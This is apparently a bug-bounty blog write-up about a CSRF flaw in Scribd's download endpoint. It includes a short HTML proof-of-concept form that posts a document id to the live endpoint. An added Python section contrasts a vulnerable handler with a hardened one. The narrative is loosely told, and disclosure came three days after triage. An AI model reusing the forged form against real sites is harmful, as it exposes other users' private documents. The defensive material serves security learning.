How I Found Information Disclosure on Scribd.com
Hi, this is my first write-up on medium.com.
11 days ago I found a vulnerability on scribd.com while I was looking for an answer to my homework (I was lazy at the time).
I then created a document and made it private.
The download button made me curious, so I decided to intercept the traffic before pressing it. I found a request with the POST method to the URL: https://www.scribd.com/document_downloads/request_document_for_download
Then I created a document, gave it a password (made it private), and tried to get access to it from another account. I created a new account and made a CSRF page whose contents were more or less like this:
```html
<html>
  <head>
    <title>Scribd Vulnerability</title>
  </head>
  <body>
    <form action="https://www.scribd.com/document_downloads/request_document_for_download" method="POST">
      <input type="hidden" name="id" value="(ID FILE)" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
and tried it as a pentest.
Bingo! After that I managed to get the password to see the private document. I then asked the Scribd IT security team whether or not there was a bug bounty program. After 11 days (as of writing this) I immediately reported this bug to the Scribd team so that it could be fixed.
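The PoC above works because the download endpoint accepts a bare document id and nothing ties the request to the user who submitted it. Below is an added example of how a defender would close both gaps on the server side; it is hypothetical code written for this write-up, not Scribd's implementation. It assumes an in-memory document store, a session that carries the user's identity and a CSRF token, and that the legitimate site origin is https://www.scribd.com (the only value taken from the page). The vulnerable handler is kept beside the hardened one so the difference is visible.

```python
# Added example (not Scribd's code): a document download handler
# with and without session binding and ownership checks.
from dataclasses import dataclass
from typing import Optional, Tuple
import hmac
import secrets

# Assumed site origin, used to reject cross-site form posts.
ALLOWED_ORIGIN = "https://www.scribd.com"


@dataclass
class Document:
    doc_id: str
    owner: str
    private: bool


# Constructed sample data: "alice" owns one private and one public document.
DOCUMENTS = {
    "1001": Document("1001", "alice", True),
    "1002": Document("1002", "alice", False),
}


@dataclass
class Request:
    session_user: str           # user identified by the session cookie
    session_csrf: str           # CSRF token stored server-side in the session
    form_csrf: Optional[str]    # token the POST body carried (None if absent)
    doc_id: str                 # the "id" form field from the write-up
    origin: Optional[str] = None  # Origin header, if the browser sent one


def new_csrf_token() -> str:
    """Per-session random token; embed it in the download form as a hidden field."""
    return secrets.token_urlsafe(32)


def vulnerable_request_download(req: Request) -> Tuple[int, str]:
    """Mirrors the flaw in the write-up: only the document id is looked at.
    Any logged-in victim who loads an attacker's form hands over any document."""
    doc = DOCUMENTS.get(req.doc_id)
    if doc is None:
        return 404, "not found"
    return 200, f"download granted for {doc.doc_id}"


def hardened_request_download(req: Request) -> Tuple[int, str]:
    # 1. CSRF: the token in the POST body must match the one in the session.
    #    compare_digest avoids leaking the token through timing differences.
    if req.form_csrf is None or not hmac.compare_digest(req.form_csrf, req.session_csrf):
        return 403, "csrf token invalid"
    # 2. Defence in depth: if the browser sent an Origin header, it must be ours.
    if req.origin is not None and req.origin != ALLOWED_ORIGIN:
        return 403, "cross-site origin"
    # 3. Authorization: resolve the id, then check the session user may read it.
    #    Unknown and foreign private documents both return 404 so the endpoint
    #    cannot be used to enumerate which ids exist.
    doc = DOCUMENTS.get(req.doc_id)
    if doc is None or (doc.private and doc.owner != req.session_user):
        return 404, "not found"
    return 200, f"download granted for {doc.doc_id}"


if __name__ == "__main__":
    token = new_csrf_token()
    # A forged cross-site post from bob's browser, as in the write-up's PoC.
    forged = Request("bob", token, None, "1001", "https://attacker.example")
    print("vulnerable:", vulnerable_request_download(forged))
    print("hardened:  ", hardened_request_download(forged))
```

The two checks are independent: the CSRF token stops a third-party page from submitting the form in the victim's browser, and the ownership check stops a logged-in user from requesting a private document they do not own by changing the id themselves. Fixing only one of them leaves the other path open.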
Full Video PoC on my Blog :
https://raflipasya19.blogspot.co.id
My Youtube Channel :
T-GOX Channel
Status:
- 19 November 2018 16:59 PM = Reported to Scribd Security Team
- 20 November 2018 01:58 AM = Their team triaged my report
- 23 November 2018 09:50 PM = No response, I disclose this report xD